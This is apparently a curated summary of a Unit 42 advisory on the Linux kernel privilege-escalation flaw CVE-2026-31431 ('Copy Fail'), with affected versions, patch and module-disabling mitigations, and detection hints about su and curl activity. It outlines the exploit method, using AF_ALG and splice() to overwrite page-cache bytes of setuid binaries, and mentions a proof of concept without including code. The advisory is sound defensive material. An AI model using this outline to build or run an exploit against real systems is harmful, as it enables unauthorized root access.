Copy Fail: What You Need to Know About the Most Severe Linux Threat in Years

2026-05-05 · Source: Unit 42 · Field: Technology & Digital — Cybersecurity & Data Privacy, Cloud Computing & IT Infrastructure · Depth: Advanced, medium

Summary

A critical local privilege escalation (LPE) vulnerability, CVE-2026-31431, dubbed "Copy Fail," was publicly disclosed on April 29, 2026. Discovered via an AI-assisted process, this deterministic logic flaw allows an unprivileged local attacker to consistently gain root access across virtually all major Linux distributions released since 2017, including Ubuntu, Red Hat Enterprise Linux, and Debian. The vulnerability, residing in the Linux kernel's cryptographic subsystem (algif_aead module of the AF_ALG interface), stems from a 2017 in-place optimization bug. This flaw causes four controlled bytes to be written past the legitimate buffer into the system's file page cache during cryptographic operations. Exploitable with a 732-byte Python script, Copy Fail enables attackers to modify cached privileged executables like su or sudo in memory, bypassing integrity checks and facilitating container breakouts, multi-tenant host takeovers, and CI/CD pipeline compromises. Affected kernels range from 4.14 to 6.19.12.

Key takeaway

For MLOps Engineers or Security Engineers managing Linux environments, immediately patch systems to address CVE-2026-31431, "Copy Fail." This critical LPE vulnerability allows unprivileged local attackers to gain root access with 100% reliability, bypassing file integrity checks. If immediate patching is not feasible, you should disable the algif_aead kernel module as an interim mitigation. Proactively deploy detection queries to identify suspicious su or curl activity, as public proof-of-concept exploits are already circulating.

Key insights

A deterministic Linux kernel logic flaw enables reliable local privilege escalation via page cache corruption.

Principles

• In-place optimizations can introduce critical flaws.
• Kernel page cache manipulation bypasses integrity checks.
• Deterministic exploits pose higher, more consistent threats.

Method

An unprivileged attacker exploits the AF_ALG interface and splice() system call to overwrite four bytes in the kernel's file page cache, targeting setuid-root binaries like su or sudo.

In practice

• Disable algif_aead module as interim mitigation.
• Use XQL queries to detect su launches from unusual parents.
• Monitor for curl and su process correlation.

Topics

• Linux Kernel Security
• Local Privilege Escalation
• CVE-2026-31431
• Copy Fail Vulnerability
• Page Cache Exploitation
• AF_ALG Cryptography

Code references

• torvalds/linux

Best for: CTO, VP of Engineering/Data, Director of AI/ML, Security Engineer, MLOps Engineer, DevOps Engineer

Related on AIssential

• This critical Linux vulnerability is putting millions of systems at risk - how to protect yours — Copy Fail (CVE-2026-31431) is a critical, stable Linux kernel vulnerability enabling easy root access.
• Copy Fail and Dirty Frag: Linux Page-Cache Exploits Target Every Major Distribution — New Linux kernel page-cache vulnerabilities enable unprivileged local users to gain root access across major distributions.
• US government warns of severe CopyFail bug affecting major versions of Linux — The CopyFail vulnerability (CVE-2026-31431) grants root access on Linux systems by corrupting kernel data.
• Linux is getting a security wake-up call - why it was inevitable and I'm not worried — Linux's increased popularity and AI-driven vulnerability discovery are challenging its long-held security reputation.
• The 4th Linux kernel flaw this month can lead to stolen SSH host keys — A long-standing Linux kernel flaw allows unprivileged users to steal sensitive data via `ptrace` during process shutdown.
• Hackers are actively exploiting a bug in cPanel, used by millions of websites — A critical cPanel/WHM vulnerability (CVE-2026-41940) allows remote login bypass and full server control.

Open in AIssential →

Editorial summary, takeaway, and curation by AIssential. Original article published by Unit 42.